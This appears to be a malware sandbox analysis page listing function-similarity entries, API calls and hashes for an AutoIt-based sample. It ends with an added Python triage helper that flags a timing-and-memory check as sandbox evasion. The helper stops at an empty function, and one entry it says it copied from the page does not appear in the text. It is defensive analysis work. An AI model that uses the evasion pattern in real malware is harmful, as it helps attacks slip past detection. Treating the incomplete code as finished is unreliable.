• Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
• Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
• Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
• Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
• Opcode ID: 6b0dcf7875e5cc8b2f124becf3425b1e3567ced601fe1f13ac9ef2b9b8e14b5c
• Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
• Opcode Fuzzy Hash: 6b0dcf7875e5cc8b2f124becf3425b1e3567ced601fe1f13ac9ef2b9b8e14b5c
• Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
APIs
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
• Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B60B
• InterlockedExchange.KERNEL32(?,?), ref: 0044B619
• LeaveCriticalSection.KERNEL32(?), ref: 0044B630
• LeaveCriticalSection.KERNEL32(?), ref: 0044B641
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
• Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
• LineTo.GDI32(?,00000000,00000002), ref: 004472A0
• EndPath.GDI32(?), ref: 004472B0
• StrokePath.GDI32(?), ref: 004472BE
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
• Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
APIs
• __getptd.LIBCMT ref: 00417D1A
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __getptd.LIBCMT ref: 00417D31
• __amsg_exit.LIBCMT ref: 00417D3F
• __lock.LIBCMT ref: 00417D4F
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID:
• API String ID: 3521780317-0
• Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
• Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
APIs
• GetDesktopWindow.USER32 ref: 00471144
• GetDC.USER32(00000000), ref: 0047114D
• GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
• ReleaseDC.USER32(00000000,?), ref: 0047117B
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
• Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                                    APIs
                                                                                                                                    • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                                    • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00471139
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
• Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
APIs
• SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
• GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
• GetCurrentThreadId.KERNEL32 ref: 004389DA
• AttachThreadInput.USER32(00000000), ref: 004389E1
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
• Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
• Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00414080
• __freeptd.LIBCMT ref: 0041408A
• ExitThread.KERNEL32 ref: 00414093
Similarity
• API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3182216644-0
• Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
• Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
Strings
Similarity
• API ID: BuffCharLower
• String ID: $8'I
• API String ID: 2358735015-3608026889
• Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
• Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
• Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
• Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Strings
Similarity
• API ID: CopyVariant$ContainedObject$ErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 3380330463-3941886329
• Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
• Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
• Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
• Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: 0vH
                                                                                                                                    • API String ID: 1143807570-3662162768
                                                                                                                                    • Opcode ID: c09e7a550d587b66afd16ae3f9308ee528eb86d4dd4285a1c93ad52bd0ffcd86
                                                                                                                                    • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                                    • Opcode Fuzzy Hash: c09e7a550d587b66afd16ae3f9308ee528eb86d4dd4285a1c93ad52bd0ffcd86
                                                                                                                                    • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96

Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID: HH$HH
• API String ID: 0-1787419579
• Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
• Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
• Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
• Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95

Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 4788cf6f182db8212a4dd4ca04636ab1929000af0f3277abda7ed9995d735732
• Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
• Opcode Fuzzy Hash: 4788cf6f182db8212a4dd4ca04636ab1929000af0f3277abda7ed9995d735732
• Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A

APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
• Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
• Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
• Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A

Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
• Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA

APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
• Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768

APIs
• GetWindowTextLengthW.USER32(00000000), ref: 004515DA
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
• Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729

APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
• Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
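Most function entries on this page are thin wrappers around user32 control messages, while the entry above (Sleep followed by GlobalMemoryStatusEx in one function) is the code behind the report's "detect sleep reduction / modifications" signature. The following Python is an added triage helper, not Joe Sandbox tooling or code from the sample: it parses entries in the plain-text form shown here, decodes the SendMessageW message constants (EM_SETSEL, CB_ADDSTRING, CB_SETCURSEL, LB_FINDSTRINGEXACT, TVM_GETCOUNT, TVM_INSERTITEMW are the real user32 values), and ranks each function by the API combination it uses so an analyst starts with the evasion candidate rather than the GUI glue. The SAMPLE text is constructed from three entries on this page; the INTERESTING table, the verdict rules, and the reading of Joe Sandbox's "API ID" as the callees' CamelCase words in sorted order are assumptions of this example.

```python
# Added triage helper for Joe Sandbox function-similarity entries (not Joe Sandbox code).
import re
from dataclasses import dataclass, field

# Constructed sample: three function entries copied from this report.
SAMPLE = """\
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
Similarity
• API ID: MessageSend
• String ID: Combobox
• Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
APIs
Strings
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
"""

# APIs worth a second look and the behaviour class of each (analyst assumption).
INTERESTING = {"Sleep": "timing", "GetTickCount": "timing",
               "GlobalMemoryStatusEx": "host-fingerprint",
               "inet_addr": "network", "htons": "network", "connect": "network"}
# user32 message constants behind the SendMessageW calls on this page.
MSG_NAMES = {0x00B1: "EM_SETSEL", 0x0143: "CB_ADDSTRING", 0x014E: "CB_SETCURSEL",
             0x01A2: "LB_FINDSTRINGEXACT", 0x1105: "TVM_GETCOUNT", 0x1132: "TVM_INSERTITEMW"}
API_LINE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*?)\))?,? ref: ([0-9A-Fa-f]{8})$")
FIELD_LINE = re.compile(r"^• ([^:]+): ?(.*)$")
SUFFIXES = {"A", "W", "Ex"}  # assumed dropped by Joe Sandbox when it builds the API ID


@dataclass
class Entry:
    apis: list = field(default_factory=list)    # (name, module, args, ref)
    fields: dict = field(default_factory=dict)  # Similarity key -> value


def parse_entries(text):
    """Split report text into entries; a new one starts at an APIs/Strings header."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            if not entries or entries[-1].fields:  # previous entry is complete
                entries.append(Entry())
            continue
        if not entries:
            continue
        m = API_LINE.match(line)
        if m:
            name, module, args, ref = m.groups()
            entries[-1].apis.append((name, module, args or "", ref))
            continue
        m = FIELD_LINE.match(line)
        if m:
            entries[-1].fields[m.group(1)] = m.group(2)
    return entries


def api_names(entry):
    """Callee names from the API lines, else inferred from Joe's API ID, which
    concatenates the callees' CamelCase words in sorted order (assumption)."""
    if entry.apis:
        return {api[0] for api in entry.apis}
    api_id = entry.fields.get("API ID", "")
    def words(n): return [w for w in re.findall(r"[A-Z][a-z]*|[a-z_]+", n) if w not in SUFFIXES]
    return {n for n in INTERESTING if all(w in api_id for w in words(n))}


def triage(entry):
    """Return (verdict, decoded SendMessageW calls) for one function entry."""
    classes = {INTERESTING[n] for n in api_names(entry) if n in INTERESTING}
    msgs = []
    for name, _module, args, ref in entry.apis:
        parts = args.split(",")
        if name == "SendMessageW" and len(parts) > 1 and re.fullmatch(r"[0-9A-Fa-f]+", parts[1]):
            msgs.append(f"{ref}: {MSG_NAMES.get(int(parts[1], 16), parts[1])}")
    if {"timing", "host-fingerprint"} <= classes:
        return "anti-sandbox candidate", msgs  # a delay and a RAM probe in one function
    if classes:
        return "/".join(sorted(classes)), msgs
    return ("gui wrapper" if msgs else "unclassified"), msgs  # plain control messages


def report(text):
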